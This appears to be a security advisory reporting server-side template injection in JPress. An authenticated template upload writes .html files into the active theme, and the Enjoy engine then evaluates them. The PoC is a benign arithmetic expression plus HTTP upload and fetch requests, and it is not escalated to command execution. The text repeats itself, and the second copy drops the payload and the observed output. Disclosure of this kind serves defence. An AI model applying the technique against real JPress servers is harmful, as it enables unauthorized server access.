Summary
An authenticated administrator with template-management permission can upload an .html file into the active JPress theme directory. The uploaded file is subsequently processed by the JFinal Enjoy template engine, allowing server-side template expressions to be evaluated.
Details
The upload producer is located in:
jpress-web/src/main/java/io/jpress/web/admin/_TemplateController.java
Method:
_TemplateController.doUploadFile()
Relevant behavior:
File pathFile = new File(template.getAbsolutePathFile(), dirName);
FileUtils.copyFile(uploadFile.getFile(), new File(pathFile, fileName));
The uploaded file is written directly into the active theme directory. Files ending in .html are registered in the current template and the template cache is cleared.
The sink is located in:
jpress-core/src/main/java/io/jpress/web/render/TemplateRender.java
Relevant behavior:
template = getEngine().getTemplate(view);
template.render(data, baos);
Because the uploaded file is later loaded by the Enjoy template engine, template expressions inside the uploaded file are evaluated server-side.
This creates the following producer-consumer chain:
Authenticated template upload
->
Active theme directory
->
TemplateRender
->
Enjoy expression evaluation
The issue requires an authenticated user with permission to manage or upload theme templates. It is not an unauthenticated vulnerability.
PoC
Create a file named jpress-puc-add.html:
PUC_ADD_#(111+2)
Upload it:
POST /admin/template/doUploadFile?d=/&csrf_token=<valid_csrf_token> HTTP/1.1
Host: 192.168.235.128:8090
Cookie:
Content-Type: multipart/form-data
file=@jpress-puc-add.html
The server responds:
{"state":"ok"}
Then request:
GET /jpress-puc-add.html HTTP/1.1
Host: 192.168.235.128:8090
Observed response:
PUC_ADD_113
The input expression #(111+2) was evaluated by the server and rendered as 113.
Impact
An authenticated user with template-management privileges can inject server-side template expressions into the active JPress theme. Depending on the available Enjoy engine capabilities and application configuration, this may allow unauthorized access to server-side data or further server-side code execution.
The demonstrated impact is confirmed server-side template expression evaluation. Operating-system command execution was not used or confirmed in this PoC.
Summary
An authenticated administrator with template-management permission can upload an .html file into the active JPress theme directory. The uploaded file is subsequently processed by the JFinal Enjoy template engine, allowing server-side template expressions to be evaluated.
Details
The upload producer is located in:
jpress-web/src/main/java/io/jpress/web/admin/_TemplateController.java
Method:
_TemplateController.doUploadFile()
Relevant behavior:
File pathFile = new File(template.getAbsolutePathFile(), dirName);
FileUtils.copyFile(uploadFile.getFile(), new File(pathFile, fileName));
The uploaded file is written directly into the active theme directory. Files ending in .html are registered in the current template and the template cache is cleared.
The sink is located in:
jpress-core/src/main/java/io/jpress/web/render/TemplateRender.java
Relevant behavior:
template = getEngine().getTemplate(view);
template.render(data, baos);
Because the uploaded file is later loaded by the Enjoy template engine, template expressions inside the uploaded file are evaluated server-side.
This creates the following producer-consumer chain:
Authenticated template upload
->
Active theme directory
->
TemplateRender
->
Enjoy expression evaluation
The issue requires an authenticated user with permission to manage or upload theme templates. It is not an unauthenticated vulnerability.
PoC
Create a file named jpress-puc-add.html:
Upload it:
POST /admin/template/doUploadFile?d=/&csrf_token=<valid_csrf_token> HTTP/1.1
Host: 192.168.235.128:8090
Cookie:
Content-Type: multipart/form-data
file=@jpress-puc-add.html
The server responds:
{"state":"ok"}
Then request:
GET /jpress-puc-add.html HTTP/1.1
Host: 192.168.235.128:8090
Observed response:
The input expression #(111+2) was evaluated by the server and rendered as 113.
Impact
An authenticated user with template-management privileges can inject server-side template expressions into the active JPress theme. Depending on the available Enjoy engine capabilities and application configuration, this may allow unauthorized access to server-side data or further server-side code execution.
The demonstrated impact is confirmed server-side template expression evaluation. Operating-system command execution was not used or confirmed in this PoC.